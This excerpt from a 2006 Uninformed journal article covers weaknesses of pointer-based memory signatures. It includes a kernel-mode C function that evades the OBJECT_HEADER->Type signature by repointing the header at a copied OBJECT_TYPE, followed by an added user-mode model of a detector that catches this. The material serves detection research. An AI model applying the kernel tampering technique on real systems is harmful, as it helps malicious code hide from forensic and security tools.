Uninformed: Informative Information for the Uninformed

Vol 4» 2006.Jun

Pointer Based Signatures

Using a memory signature that is a valid pointer to some common object or static data is a very appealing signature to use for detection because of its reliability; however, it is also an easy signature to bypass. The following demonstrates the most simplistic method of bypassing the OBJECT_HEADER->Type signature that this paper uses as a generic object memory signature. This is possible because the OBJECT_TYPE is just an allocated structure of fairly stable data: a copy of it is as good as the original to anything that only follows the pointer. Many pointer based signatures with similar static characteristics are open to the same attack.

NTSTATUS KillObjectTypeSignature (
    IN  PVOID   Object
    )
{
    NTSTATUS        ntStatus = STATUS_SUCCESS;
    POBJECT_HEADER  pHdr;
    PVOID           pDummyObject;

    // Locate the OBJECT_HEADER that precedes the object body.
    pHdr = OBJECT_TO_OBJECT_HEADER( Object );

    // Allocate a private copy of the OBJECT_TYPE structure.
    pDummyObject = ExAllocatePool( NonPagedPool, sizeof(OBJECT_TYPE) );
    if ( pDummyObject == NULL )
    {
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    // Duplicate the type's contents, then point the header at the copy so
    // the Type field no longer equals the well-known OBJECT_TYPE address.
    RtlCopyMemory( pDummyObject, pHdr->Type, sizeof(OBJECT_TYPE) );

    pHdr->Type = pDummyObject;

    return ntStatus;
}
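The following is an added, user-mode illustration and not code from the paper. It models the two sides of the problem above: a scanner that keys on the OBJECT_HEADER->Type pointer value (the signature the text describes) and a defender-side check that instead asks whether the Type pointer is one of the registered object types at all, which a relocated copy is not. The OBJECT_TYPE and OBJECT_HEADER structs are deliberately minimal stand-ins, the registered-type table is a constructed substitute for the kernel's own bookkeeping, and all function names are this example's own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Minimal stand-ins for the kernel structures the text names (assumption:
 * only the fields the signature logic needs are modelled). */
typedef struct _OBJECT_TYPE {
    uint32_t TotalNumberOfObjects;
    char     Name[16];
} OBJECT_TYPE;

typedef struct _OBJECT_HEADER {
    OBJECT_TYPE *Type;   /* the pointer a pointer-based signature keys on */
    uint32_t     Flags;
} OBJECT_HEADER;

/* Constructed stand-in for the kernel's table of registered object types. */
#define MAX_TYPES 8
static OBJECT_TYPE *registered_types[MAX_TYPES];
static size_t       registered_count;

static OBJECT_TYPE *register_type(const char *name)
{
    if (registered_count >= MAX_TYPES) return NULL;
    OBJECT_TYPE *t = calloc(1, sizeof *t);
    if (!t) return NULL;
    strncpy(t->Name, name, sizeof t->Name - 1);
    registered_types[registered_count++] = t;
    return t;
}

static void reset_registry(void)
{
    for (size_t i = 0; i < registered_count; i++) free(registered_types[i]);
    registered_count = 0;
}

/* Pointer-based signature as in the text: an object "is" a Process iff
 * header->Type holds the one well-known OBJECT_TYPE address. */
size_t scan_by_type_pointer(const OBJECT_HEADER *hdrs, size_t n,
                            const OBJECT_TYPE *expected)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        if (hdrs[i].Type == expected) hits++;
    return hits;
}

/* Defender-side check: a Type pointer that is not a registered OBJECT_TYPE
 * address is anomalous, no matter how genuine the bytes it points at look. */
static bool is_registered_type(const OBJECT_TYPE *t)
{
    for (size_t i = 0; i < registered_count; i++)
        if (registered_types[i] == t) return true;
    return false;
}

size_t count_unregistered_types(const OBJECT_HEADER *hdrs, size_t n)
{
    size_t flagged = 0;
    for (size_t i = 0; i < n; i++)
        if (!is_registered_type(hdrs[i].Type)) flagged++;
    return flagged;
}

/* The relocation from the text, in this model: copy the OBJECT_TYPE bytes to
 * a fresh allocation and repoint the header at the copy. */
static bool relocate_type(OBJECT_HEADER *hdr)
{
    OBJECT_TYPE *copy = malloc(sizeof *copy);
    if (!copy) return false;
    memcpy(copy, hdr->Type, sizeof *copy);
    hdr->Type = copy;
    return true;
}

typedef struct {
    size_t matched_by_pointer;    /* hits the pointer signature still gets */
    size_t flagged_unregistered;  /* headers the registry check flags */
} ScanResult;

/* Builds `objects` headers of one type, relocates the first `relocated` of
 * them, and runs both checks over the whole set. */
ScanResult run_scenario(size_t objects, size_t relocated)
{
    ScanResult r = {0, 0};
    reset_registry();
    OBJECT_TYPE *process_type = register_type("Process");
    register_type("Thread");            /* a second legitimate type */
    if (!process_type || objects == 0) return r;

    OBJECT_HEADER *hdrs = calloc(objects, sizeof *hdrs);
    if (!hdrs) return r;
    for (size_t i = 0; i < objects; i++) hdrs[i].Type = process_type;
    if (relocated > objects) relocated = objects;
    for (size_t i = 0; i < relocated; i++) relocate_type(&hdrs[i]);

    r.matched_by_pointer   = scan_by_type_pointer(hdrs, objects, process_type);
    r.flagged_unregistered = count_unregistered_types(hdrs, objects);

    for (size_t i = 0; i < objects; i++)
        if (hdrs[i].Type != process_type) free(hdrs[i].Type);  /* the copies */
    free(hdrs);
    reset_registry();
    return r;
}

int main(void)
{
    ScanResult r = run_scenario(3, 1);
    printf("pointer signature hits: %zu of 3, registry check flags: %zu\n",
           r.matched_by_pointer, r.flagged_unregistered);
    return 0;
}
```

With three objects and one relocated, the pointer signature drops to two hits while the registry check flags exactly the relocated one; the point for a detector is that the strength of a pointer-based signature comes from the set of addresses the pointer may legitimately hold, not from the pointer's own value.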